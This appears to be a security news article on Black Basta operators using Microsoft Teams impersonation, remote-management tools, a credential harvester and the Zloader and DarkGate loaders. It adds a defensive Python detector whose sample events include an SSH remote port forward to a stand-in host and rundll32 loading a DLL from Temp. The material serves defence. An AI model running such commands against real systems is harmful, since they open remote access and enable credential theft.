Black Basta Ransomware Leverages Microsoft Teams to Deliver Malware


Black Basta ransomware operators have improved their tactics, leveraging Microsoft Teams to deploy Zbot, DarkGate, and Custom Malware.

The ongoing social engineering campaign comprises a threat actor flooding a user’s inbox with junk and contacting the user to offer assistance. 

Researchers observed that threat actors used Microsoft Teams as their primary medium for initial communication with the target.

If the user responds to the lure by answering the call or replying to the message, the threat actor tries to persuade them to install or run a remote monitoring and management (RMM) program such as QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect, among others.

After establishing a remote connection, the threat actor proceeds to download payloads from their infrastructure to obtain the credentials of the affected users and continue to persistently target their assets.

“The overall goal following initial access appears to be the same: to quickly enumerate the environment and dump the user’s credentials. Operators will still attempt to steal any available VPN configuration files when possible,” Rapid7 said in a report shared with Cyber Security News.

“With the user’s credentials, organization VPN information, and potential MFA bypass, it may be possible for them to authenticate directly to the target environment.”


Threat Actors’ Updated Tactics and Malware Payloads

Researchers noticed that operators used specific display names for their Microsoft Teams accounts, sometimes padded with whitespace characters.

Threat actors pose as IT employees of the targeted company by using their first and last names as the chat display name and/or account login.

Operator Chat Display Name

Threat actors use the OpenSSH client, a native Windows program, to establish a reverse shell.

The threat actor provided the targeted user with a QR code in at least one case. Although the QR code’s intent is unknown, it seems to be an attempt to get around MFA after stealing a user’s login credentials.

Rapid7 has seen the use of the same credential harvesting executable, previously known as AntiSpam.exe, but it is now delivered in the form of a DLL and is normally executed by rundll32. 

Previously, the application was an unobfuscated .NET executable; it is now frequently embedded within a compiled 64-bit DLL loader.

The most recent versions of the credential harvester now save output to the file 123.txt in the user’s %TEMP% directory, replacing the old qwertyuio.txt file.

However, earlier versions of the DLL distributed during the campaign would still output to the previous file.

Credential harvesting prompt displayed to the user

Most frequently, a loader like Zbot (also known as Zloader) or DarkGate is executed after the credential harvester.

This can then assist data theft, function as a gateway for the execution of future payloads in memory, or carry out other malicious tasks.

The modular trojan Zloader, also known as Terdot, DELoader, or Silent Night, was created using the leaked Zeus source code. 

The loader module of the latest version of Zloader encountered major modifications, including the addition of RSA encryption, an update to the domain generation process, and the first compilation for 64-bit Windows operating systems.

DarkGate is a multifunctional malware toolkit that has capabilities for keylogging, remote code execution, increasing privileges, avoiding detection, and stealing data from web browsers and Discord.

Operators were also distributing alternative payload archives containing Cobalt Strike beacon loaders and two Java payloads: a custom multi-threaded beacon used to execute PowerShell commands remotely, and a variant of the user credential harvester.

In certain instances, operators have delivered a short command to the user using Teams, which, once executed by the intended user, will start an infection chain.
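As an added illustration (not from the Rapid7 report), the following detector flags the host-side indicators described above in a few constructed Sysmon-style events: rundll32 loading a DLL from a user-writable path, the OpenSSH client opening a remote port forward (assumed here to be the reverse-shell mechanism; the article does not state the exact command), an RMM tool outside the organization's approved set, and the harvester's 123.txt or qwertyuio.txt output in %TEMP%. Binary names, paths and the 203.0.113.10 address are constructed.

```python
import re

# Assumed approved-RMM list (see the recommendation to standardize remote management tools).
APPROVED_RMM = {"screenconnect.client.exe"}
# Hypothetical binary names for the RMM tools the article lists.
RMM_BINARIES = {"quickassist.exe", "anydesk.exe", "teamviewer.exe", "level.exe", "screenconnect.client.exe"}
# Output file names the article attributes to the credential harvester.
HARVESTER_OUTPUT = {"123.txt", "qwertyuio.txt"}
# User-writable locations: %TEMP% and the user's Downloads folder.
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|users\\[^\\]+\\downloads)\\", re.I)
# ssh remote port forward (-R) is case-sensitive, so match it without lowercasing.
SSH_REMOTE_FWD = re.compile(r"\s-R\s")


def classify(event: dict) -> list[str]:
    """Return a list of human-readable findings for one process- or file-creation event."""
    findings = []
    if event["type"] == "process":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        cmdline = event["cmdline"]
        if image == "rundll32.exe" and USER_WRITABLE.search(cmdline):
            findings.append("rundll32 loading a DLL from a user-writable path")
        if image == "ssh.exe" and SSH_REMOTE_FWD.search(cmdline):
            findings.append("OpenSSH client with remote port forward (possible reverse shell)")
        if image in RMM_BINARIES and image not in APPROVED_RMM:
            findings.append(f"unapproved remote management tool: {image}")
    elif event["type"] == "file":
        name = event["path"].rsplit("\\", 1)[-1].lower()
        if name in HARVESTER_OUTPUT and USER_WRITABLE.search(event["path"]):
            findings.append(f"credential harvester output file: {name}")
    return findings


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run classify() over every event and pair each finding with its event index."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]


# Constructed sample telemetry (simplified Sysmon event fields).
EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\AntiSpam.dll,Entry"},
    {"type": "process", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -R 8080:127.0.0.1:22 user@203.0.113.10"},
    {"type": "process", "image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"type": "file", "path": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\123.txt"},
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign: system DLL, no user path
]

if __name__ == "__main__":
    for index, finding in scan(EVENTS):
        print(f"event {index}: {finding}")
```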

Recommendations

  • Limit external users’ ability to communicate with users using Microsoft Teams as much as feasible.
  • Standardize the environment’s remote management tools.
  • Train users on how to recognize the social engineering campaign.
  • Standardize VPN access.
